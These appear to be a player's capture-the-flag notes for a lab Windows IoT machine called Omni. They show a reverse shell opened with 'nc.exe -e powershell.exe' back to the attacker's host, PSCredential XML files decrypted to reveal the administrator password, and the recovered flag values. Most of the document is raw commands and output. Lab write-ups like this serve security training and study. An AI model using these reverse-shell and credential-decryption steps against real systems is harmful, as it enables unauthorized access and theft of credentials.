5 cracking user.txt | root.txt
# to crack user.txt we needed app's password, we have app:mesh5143
PS C:\data\users\app> more user.txt
more user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">flag</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
</Props>
</Obj>
</Objs>
# this is XML
# looking up 'system.management.automation.pscredential decrypt password'
https://www.travisgan.com/2015/06/powershell-password-encryption.html
| Decrypt encrypted password in a file using Import-Clixml (xml file)
PS C:\data\users\app> $UserCred = Import-Clixml -Path c:\data\users\app\user.txt
$UserCred = Import-Clixml -Path c:\data\users\app\user.txt
Import-Clixml : Error occurred during a cryptographic operation.
At line:1 char:13
+ $UserCred = Import-Clixml -Path c:\data\users\app\user.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Import-Clixml], Cryptographic
Exception
+ FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept
ion,Microsoft.PowerShell.Commands.ImportClixmlCommand
# we need to be that user in shell, which we are not (apparently)
# getting reverse shell from http://10.10.10.204:8080/#Run%20command
c:\inetput\wwwwroot\nc.exe -e powershell.exe 10.10.16.7 7070
$ nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.204] 49684
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32> $env:UserName
$env:UserName
app
PS C:\windows\system32> $env:UserDomain
$env:ComputerName
$env:UserDomain
OMNI
PS C:\windows\system32> $env:ComputerName
omni
PS C:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
OMNI\app
# cracking user.txt
PS C:\windows\system32> $UserCred = Import-Clixml -Path C:\data\Users\app\user.txt
$UserCred = Import-Clixml -Path C:\data\Users\app\user.txt
# this creates a Credential Object
PS C:\windows\system32> $UserCred
UserName Password
-------- --------
flag System.Security.SecureString
# to decrypt it
PS C:\windows\system32> $UserCred.GetNetworkCredential().password
$UserCred.GetNetworkCredential().password
7cfd50f6bc34db3204898f1505ad9d70
# cracking root didnt work as we are not administrator
PS C:\data\users\app> $UserCred = Import-Clixml -Path C:\data\Users\administrator\root.txt
$UserCred = Import-Clixml -Path C:\data\Users\administrator\root.txt
Import-Clixml : Access to the path 'C:\data\Users\administrator\root.txt' is
denied.
At line:1 char:13
+ $UserCred = Import-Clixml -Path C:\data\Users\administrator\root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OpenError: (:) [Import-Clixml], UnauthorizedAcce
ssException
+ FullyQualifiedErrorId : FileOpenFailure,Microsoft.PowerShell.Commands.Im
portClixmlCommand
# found intresting files in app's directory
PS C:\data\users\app> dir
Directory: C:\data\users\app
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/4/2020 7:28 PM 3D Objects
d-r--- 7/4/2020 7:28 PM Documents
d-r--- 7/4/2020 7:28 PM Downloads
d----- 7/4/2020 7:28 PM Favorites
d-r--- 7/4/2020 7:28 PM Music
d-r--- 7/4/2020 7:28 PM Pictures
d-r--- 7/4/2020 7:28 PM Videos
-ar--- 7/4/2020 8:20 PM 344 hardening.txt
-ar--- 7/4/2020 8:14 PM 1858 iot-admin.xml
-ar--- 7/4/2020 9:53 PM 1958 user.txt
PS C:\data\users\app> more hardening.txt
more hardening.txt
- changed default administrator password of "p@ssw0rd"
- added firewall rules to restrict unnecessary services
- removed administrator account from "Ssh Users" group
PS C:\data\users\app> cat iot-admin.xml
cat iot-admin.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">omni\administrator</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa28853640000000002000000000010660000000100002000000000855856bea37267a6f9b37f9ebad14e910d62feb252fdc98a48634d18ae4ebe000000000e80000000020000200000000648cd59a0cc43932e3382b5197a1928ce91e87321c0d3d785232371222f554830000000b6205d1abb57026bc339694e42094fd7ad366fe93cbdf1c8c8e72949f56d7e84e40b92e90df02d635088d789ae52c0d640000000403cfe531963fc59aa5e15115091f6daf994d1afb3c2643c945f2f4b8f15859703650f2747a60cf9e70b56b91cebfab773d0ca89a57553ea1040af3ea3085c27</SS>
</Props>
</Obj>
</Objs>
PS C:\data\users\app> $UserCred = Import-Clixml -Path C:\data\Users\app\iot-admin.xml
$UserCred = Import-Clixml -Path C:\data\Users\app\iot-admin.xml
PS C:\data\users\app> $UserCred.GetNetworkCredential().password
$UserCred.GetNetworkCredential().password
_1nt3rn37ofTh1nGz
# we cannot ssh due to hardening.txt
# looking at the username for the first shell we got
PS C:\data\users\app> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
NT AUTHORITY\SYSTEM
# cannot use it here also
# trying administrator:_1nt3rn37ofTh1nGz on IOT Device Portal
$ nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.204] 49685
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
OMNI\Administrator
# trying a different method to get root flag
$username = "omni\administrator"
$password = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7" |convertto-securestring
$cred = New-Object System.Management.Automation.PSCredential($username, $password)
$cred.GetNetworkCredential() | fl
PS C:\data\users\administrator> $cred.GetNetworkCredential() | fl
$cred.GetNetworkCredential() | fl
UserName : administrator
Password : 5dbdce5569e2c4708617c0ce6e9bf11d
Domain : omni
Last updated